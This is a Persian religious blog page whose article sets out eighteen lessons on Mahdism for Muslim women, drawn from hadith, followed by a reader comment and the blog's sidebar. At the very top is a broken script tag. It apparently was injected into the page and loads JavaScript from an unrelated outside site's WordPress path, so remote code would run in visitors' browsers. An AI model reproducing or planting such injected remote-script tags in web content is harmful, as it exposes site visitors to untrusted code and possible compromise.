script type=’text/javascript’ src=’http://taklearn.ir/wp-includes/js/l10n.js?ver=20101110′> پيام‌هاي مهدوي به زن مسلمان .
منجی عشق
این وبلاگ قصد دارد شما را با موضوع مهدویت بیشتر آشنا کند

پيام‌هاي مهدوي به زن مسلمان

چكيده
امام زمان عجل الله تعالي فرجه الشريف آن گونه كه از قرآن و روايات نبوي و اهل بيت عليهم السلام استفاده مي‌شود داراي اهداف و آرمان‌هاي بسيار بلندي است كه قرار است در عصر ظهور آنها را در سطح جهان پياده نمايد،آرمان هايي كه فقط با امدادهاي غيبي و به توسط مردي الهي هم‌چون او قابل پياده شدن است. ولي اين به آن معنا نيست كه در عصر غيبت هيچ مرتبة از آن آرمان‌ها قابل پياده شدن نيست، ما مي‌توانيم در سطوح مختلف جامعه و در قشرهاي مختلف جلوه هايي از آنها را با الگو گرفتن از حضرت مهدي عجل الله تعالي فرجه الشريف و يارانش پياده كنيم تا زمينه‌ساز ظهور او گرديم. يك قشر مهم از اقشار جامعه بانوان هستند كه مي‌توانند با الگو گرفتن از آرمان‌هاي بلند مهدوي، جامعه اي مهدوي در حد خود و در عصر غيبت پياده كنند، و اين با برداشت پيام هايي است كه از فرهنگ مهدويت به دست مي‌آيد، موضوعي كه ما در اين مقاله در حدّ وسع و توان‌مان به آن مي‌پردازيم.
مقدمه
گاهي اين سؤال در ذهن انسان، تداعي مي‌شود که آيا بحث از مهدويت و فرهنگ مهدوي، صرفاً جنبة تاريخي دارد؛ يا مي‌توان مباحث مهدويت را به روز کرده، و جنبة کاربردي به آن داد. بايد اشاره کرد که مي‌توان، در عصر پيش از ظهور، پرتويي از جامعة مهدوي را با اجراي درصدي از اهداف ظهور ايجاد کرد؛ چرا که رسيدن به اهداف عالي ظهور، تنها در هنگام ظهور حضرت مهدي عجل الله تعالي فرجه الشريف ممکن است. اين مطلب را با چند مقدمه مي‌توان اثبات نمود:
1. زمينه سازي براي ظهور
از آن‌جا که غيبت حضرت مهدي عجل الله تعالي فرجه الشريف از ناحية ما بوده[1]؛ ما نيز در ظهور او مؤثر خواهيم بود، و اين امر تنها با به کار بردن اهداف حضرت مهدي عجل الله تعالي فرجه الشريف – گرچه در سطح محدود ـ تحقق خواهد يافت. بنابراين در روايتي از پيامبر صل الله عليه و آله و سلم آمده است: « قومي از مشرق زمين، خروج مي‌کنند که زمينه‌ساز سلطنت و حکومت مهدي عجل الله تعالي فرجه الشريف خواهند بود»[2] . اين آماده سازي مي‌تواند در زمينة فرهنگ و عقلانيت مردم باشد، که در صورت بالا رفتن سطح آن، زمينه براي ظهور حضرت، فراهم خواهد شد. از امام باقر عليه السلام نقل شده است که فرمود: « چون قائم ما، قيام کند؛ دستش را بر سر بندگان مي‌گذارد و عقول آنها را متمرکز ساخته و اخلاق را به کمال مي‌رساند»[3] . از اين حديث استفاده مي‌شود که کار حضرت مهدي عجل الله تعالي فرجه الشريف، تکميل نقص عقول و اخلاق مردم است تا از معارف الهي بهره مند شوند. در نتيجه اين مردم هستند که با تلاش خود و بالا بردن سطح علم، اخلاق و فرهنگ جامعه مي‌توانند زمينه‌ساز ظهور کلي حضرت شوند تا به واسطة آن به کمال عقلاني نهايي برسند.
2. الگوگيري از حکومت مهدوي
امام زمان عجل الله تعالي فرجه الشريف، رهبر و الگوي کامل براي شيعيان است و لذا مردو زن وظيفه دارند تا در حد امکان، از اهداف بلند آن حضرت بهره برده و خود را به او نزديک نمايند. بنابراين ما مي‌توانيم با سرمشق قرار دادن اهداف عالي آن بزرگوار، جامعه‌اي مهدوي ـ هرچند محدود ـ ايجاد نماييم.
3. منتظران مصلح، خود صالح‌اند.
کساني که در انتظار مصلح جهاني به سر مي‌برند، خود بايد صالح باشند و اين با پياده کردن اهداف قيام حضرت مهدي عجل الله تعالي فرجه الشريف در جامعه ـ هر چند در سطح محدود ـ ميسر مي‌شود.
وجود زنان در ميان اصحاب حضرت مهدي عجل الله تعالي فرجه الشريف
در رابطه با اصحاب حضرت مهدي عجل الله تعالي فرجه الشريفکه راجع به زنان است، دو روايت وجود دارد که در يکي از آنها اشاره به وجود سيزده زن در بين اصحاب حضرت دارد و در ديگري پنجاه زن. ممکن است که جمع بين دو دسته، اين گونه باشد که مجموع اصحاب حضرت مهدي عجل الله تعالي فرجه الشريف از زنان، پنجاه نفر است که سيزده نفر آنها، کساني هستند که رجعت کرده و از قبر، سر بر مي‌آورند و در حکومت حضرت، سهيم خواهند بود.
1. مفضل بن عمر مي‌گويد: از امام صادق عليه السلام شنيدم که مي‌فرمود:« همراه قائم عجل الله تعالي فرجه الشريف سيزده زن وجود دارد. عرض کردم، از آنها در چه کاري بهره مي‌گيرد؟ فرمود: آنان مجروحان را مداوا کرده و از آنها پرستاري مي‌کنند؛ همان‌گونه که زنان همراه رسول خدا صل الله عليه و آله و سلم، چنين مي‌کردند. عرض کردم: نام آنها را براي من بگو! حضرت فرمود: قنواء دختر رُشَيد، ام ايمن، حبابه والبيه، سميه مادر عمار بن ياسر، زبيده، ام خالد احمسيه، ام سعيد حنفيه، وصبانه ما شطه و ام خالد جهنيه»[4].
2. جابر بن يزيد جعفي از امام باقر عليه السلام نقل کرده است که فرمود: « به خدا سوگند! سيصد و بيشتر از ده نفر مي‌آيند که در ميان آنها، پنجاه نفر زن وجود دارد. آنان در مکه بدون وقت مقرر، اجتماع مي‌کنند؛ دسته هايي همانند ابرهاي پاييز، بعضي پشت سر بعضي ديگر. و اين همان آيه‌اي است که خداوند فرمود: هر کجا باشيد خداوند تمام شما را خواهد آورد؛ زيرا او بر هر چيزي قادر است.»[5]
اگر چه اين روايت را عياشي، مرسلا نقل کرده است، ولي نعماني و ديگران، آن را با چند طريق که برخي از آنها صحيح است نقل کرده اند[6].
پيام‌هاي مهدوي
از آن‌جا که امام زمان عجل الله تعالي فرجه الشريف، امام، رهبر و ولي هر زن و مرد مسلمان شيعي است؛ لذا عصر ظهور حضرت مهدي عجل الله تعالي فرجه الشريف و رفتار آن حضرت عجل الله تعالي فرجه الشريف مي‌تواند، الگودهي براي زنان نيز باشد و آنان نيز مي‌توانند با اجراي آن اهداف، جامعه‌اي مهدوي را در اين عصر ـ که عصر غيبت است ـ پياده نمايند. اينک به برخي از اين پيام‌ها که از روايات استفاده مي‌شود اشاره مي‌کنيم:
1. شرکت در مسائل اجتماعي
هر گاه جامعه به حدي رسيد که زنان و مردان به تکامل عقلاني و اخلاقي رسيدند؛ زنان نيز مي‌توانند در مسائل سياسي و اجتماعي جامعه با حفظ شئونات اسلامي شرکت کنند و همانند مردها سهمي را ايفا نمايند. اين معنا با جمع بين دو دسته روايات، به دست مي‌آيد:
الف: رواياتي که دلالت بر تکامل عقلاني و اخلاقي انسان‌ها در عصر ظهور دارد[7].
ب: رواياتي که دلالت بر وجود زنان در بين 313 نفر اصحاب حضرت دارد[8].
2. مشارکت در انسجام اسلامي
يکي از اهداف حضرت مهدي عجل الله تعالي فرجه الشريف ايجاد وفاق و انسجام اسلامي است. لذا در دعاي ندبه مي‌خوانيم: « کجاست آن کسي که گفتار را بر تقوا جمع مي‌کند[9] ». زنان جامعة اسلامي نيز با الگو گرفتن از امام خود در حدّ توان خود مي‌توانند در اين هدف مهم در عصر غيبت سهيم باشند.
3. احياي سنت‌هاي فراموش شده
زنان نيز مي‌توانند، سنت‌هاي فراموش شده را احيا کنند؛ همان‌گونه که دربارة حضرت مهدي عجل الله تعالي فرجه الشريف مي‌خوانيم: « ... او دستورات فراموش شدة قرآن و سنت را احيا مي‌کند[10] ».
4. تعليم قرآن
زنان نيز مي‌توانند همانند حضرت مهدي عجل الله تعالي فرجه الشريف معلم قرآن باشند؛ همان که دربارة حضرت آمده است: « ... آن گونه که قرآن نازل شده، به مردم مي‌آموزد ...[11]».
5. تربيت افراد
يکي از کارهايي که امام زمان عجل الله تعالي فرجه الشريف بعد از ظهور، انجام مي‌دهد، تکميل اخلاقيات مردم است. بنابراين در روايتي که از امام باقر عليه السلام نقل شده است مي‌خوانيم: « خداوند متعال، به واسطة حضرت مهدي عجل الله تعالي فرجه الشريف اخلاق مردم را کامل مي‌کند[12] ».
زنان نيز مي‌توانند فرزندان خود و نيز خود را، با تعليمات اخلاقي تربيت کرده و آنان را به کمال برسانند.
6. تلاش در جهت رفع گرفتاري‌هاي مردم
يکي از اسامي حضرت مهدي عجل الله تعالي فرجه الشريف « غوث» است. در حديثي مي‌خوانيم: « مهدي در ميان امت من، خروج مي‌کند و خداوند او را به فرياد مردم مي‌رساند[13] ». زنان نيز مي‌توانند با اقتدا به الگوي خود، حضرت مهدي عجل الله تعالي فرجه الشريف فرياد رس گرفتاران، در حد امکان باشند.
7. اصلاح جامعه
زنان نيز مي‌توانند با الگوگيري از حضرت مهدي عجل الله تعالي فرجه الشريف در حد وسع خود، در اصلاح جامعه کوشا باشند؛ همان طور که درباره حضرت مهدي عجل الله تعالي فرجه الشريف آمده است: « خداوند متعال، به واسطة او هر آن‌چه قبل از او فساد بوده، اصلاح خواهد کرد[14]».
8. اهل عمل بودن
زنان براي تربيت اولاد و افراد جامعه بايد خود اهل عمل باشند، و تنها به خير و تقوا اشاره نمايند؛ همان گونه که سيرة حضرت مهدي عجل الله تعالي فرجه الشريف در دعوت به حق، اين گونه است. لذا از امام صادق عليه السلام نقل شده است که فرمودند: « ... او به تقوا اشاره کرده و خود عمل به هدايت مي‌کند...[15] ».
9. ايجاد عشق، در عبادت افراد
زنان بايد همانند حضرت مهدي عجل الله تعالي فرجه الشريف اولاد و افراد جامعه را عاشق عبادت کرده و کاري کنند که افراد تحت تربيت آنها عبادت را دوست دارند. از پيامبر صل الله عليه و آله و سلم نقل شده است که فرموند: « ... حضرت مهدي عجل الله تعالي فرجه الشريف دل‌هاي بندگان را، عاشق عبادت مي‌کند ...[16] ».
10. آزادي مردم از بندگي هواي نفس
زنان بايد سعي کنند تا افراد تحت تربيت خود را از بندگي هواي نفس برهانند؛ همان گونه که در مورد حضرت مهدي عجل الله تعالي فرجه الشريف مي‌خوانيم: « ... خداوند به واسطة او، ذلت بردگي ( هواي نفس) را از گردن‌هاي شما، بر مي‌دارد[17] ».
11. گسترش عدل
زنان نيز با الگوگيري از حضرت مهدي عجل الله تعالي فرجه الشريف مي‌توانند در گسترش عدل کوشا باشند؛ چنان که در روايات آمده است: « آگاه باشيد! به خدا سوگند، به طور حتم، حضرت مهدي عجل الله تعالي فرجه الشريف عدالتش را داخل خانه‌هاي شما خواهد کرد؛ همان گونه که گرما و سرما داخل خانه‌هاي شما خواهد شد[18] ».
12. برپايي نماز
زنان بايد در حد توانايي خود، در برپايي نماز کوشا باشند؛ همان طور که از اهداف حضرت مهدي عجل الله تعالي فرجه الشريف، برپايي نماز است. از زيدبن علي، نقل شده است: « هنگامي که قائم آل محمد عجل الله تعالي فرجه الشريف، قيام کند، مي‌فرمايد:‌اي مردم! ما کساني هستيم که خداوند در قرآن وعدة آنان را به شما داده است؛ آن جا که فرمود: کساني که اگر ما در روي زمين به آنان امکانات دهيم نماز را به پا، مي‌دارند...[19] ».
13. امر به معروف و نهي از منکر
در روايتي دربارة اصحاب حضرت مهدي عجل الله تعالي فرجه الشريف از زنان و مردان آمده است: « آنان، امر به معروف و نهي از منکر مي‌کنند[20] ». بنابراين اگر زنان جامعة اسلامي مي‌خواهند در راه حضرت مهدي عجل الله تعالي فرجه الشريف و اصحاب او باشند، بايد اين دو فريضه را احيا نمايند.
14. اهل تلاش بودن
زنان بايد از اصحاب حضرت مهدي عجل الله تعالي فرجه الشريف الگو گرفته و اهل کوشش و تلاش باشند؛ همان گونه که از رسول خدا صل الله عليه و آله و سلم نقل شده است که دربارة اصحاب حضرت مهدي عجل الله تعالي فرجه الشريف فرمود: « خداوند براي او از دورترين کشورها به تعداد اهل بدر ( 313 نفر) جمع مي‌کند، که همگي اهل کوشش و تلاش در راه اطاعت خدا هستند[21] ».
15. سعي در گسترش علم
زنان نيز مي‌توانند در گسترش علم در سطح جامعه در حد امکان، کوشا باشند، همان طور که از رسول خدا صل الله عليه و آله و سلم نقل شده که دربارة حضرت مهدي عجل الله تعالي فرجه الشريف فرمود: « ... خداوند عزوجل، به واسطة او زمين را بعد از تاريکي، پر از نور کرده و پس از ظلم، پر از عدل نموده و پس از جهل، پر از علم خواهد کرد[22] ».
16. تواضع و فروتني نسبت به ديگران
بانوان بايد نسبت به هم نوعان ديني خود، متواضع باشند. همان طور که دربارة حضرت مهدي عجل الله تعالي فرجه الشريف از امام صادق عليه السلام نقل شده که فرمودند: « در برابر مومنان، ذليل و در مقابل کافران، عزيزند[23] ».
17. از تنهايي نهراسيدن
هر گاه انسان، حق را يافت؛ گرچه پيروان آن کم است، نبايد از تنهايي يا کمي افراد، به خود ترس راه دهد. دربارة حضرت مهدي عجل الله تعالي فرجه الشريف مي‌خوانيم: « حق با ماست، هر کس از ما کناره گيرد ما را به وحشت نمي‌اندازد[24] ».
18. همکاري با مصلحان
امام زمان عجل الله تعالي فرجه الشريف گرچه به تنهايي مي‌تواند جهان را اداره کند، ولي اهداف عالي خود را با همکاري با مصلح بزرگ، حضرت مسيح، دنبال مي‌کند. بنابراين در حديثي از رسول خدا صل الله عليه و آله و سلم آمده است: « ... عيسي بن مريم، فرود مي‌آيد و پشت سر او نماز مي‌گذارد...[25] ». و اين عملکرد بسيار آموزنده‌اي است که بانوان ما نيز مي‌توانند از آن درس گرفته و در اين جهت به حضرت، اقتدا کنند.


نظرات شما عزیزان:

ی
ساعت8:44---8 اسفند 1390
سلام حیف حیف
مقاله به این زیبایی بدون نمایش منابع
ولی با این حال ممنونم
اجرتون با صاحب عصر(عج)


نام :
آدرس ایمیل:
وب سایت/بلاگ :
متن پیام:
:) :( ;) :D
;)) :X :? :P
:* =(( :O };-
:B /:) =DD :S
-) :-(( :-| :-))
نظر خصوصی

 کد را وارد نمایید:

 

 

 

عکس شما

آپلود عکس دلخواه:





درباره وبلاگ

چه با شکوه است تصویر ایامی که تنها حاکم عالم، دادگستری چون قائم آل محمد(عج) باشد. و چه زیباست زندگی در ایامی که پرچمی جز پرچم توحید به اهتزاز نباشد و ندائی جز ندای حق به گوش جهانیان نرسد، دورانی سرشار از عطوفت، مهربانی، عدالت، آزادگی و کرامت انسانی.
موضوعات
پيوندها

تبادل لینک هوشمند
برای تبادل لینک  ابتدا ما را با عنوان منجی عشق و آدرس monjieeshgh.LoxBlog.ir لینک نمایید سپس مشخصات لینک خود را در زیر نوشته . در صورت وجود لینک ما در سایت شما لینکتان به طور خودکار در سایت ما قرار میگیرد.





نويسندگان


ورود اعضا:

نام :
وب :
پیام :
2+2=:
(Refresh)

خبرنامه وب سایت:





آمار وب سایت:  

بازدید امروز : 5
بازدید دیروز : 0
بازدید هفته : 160
بازدید ماه : 253
بازدید کل : 33022
تعداد مطالب : 50
تعداد نظرات : 14
تعداد آنلاین : 1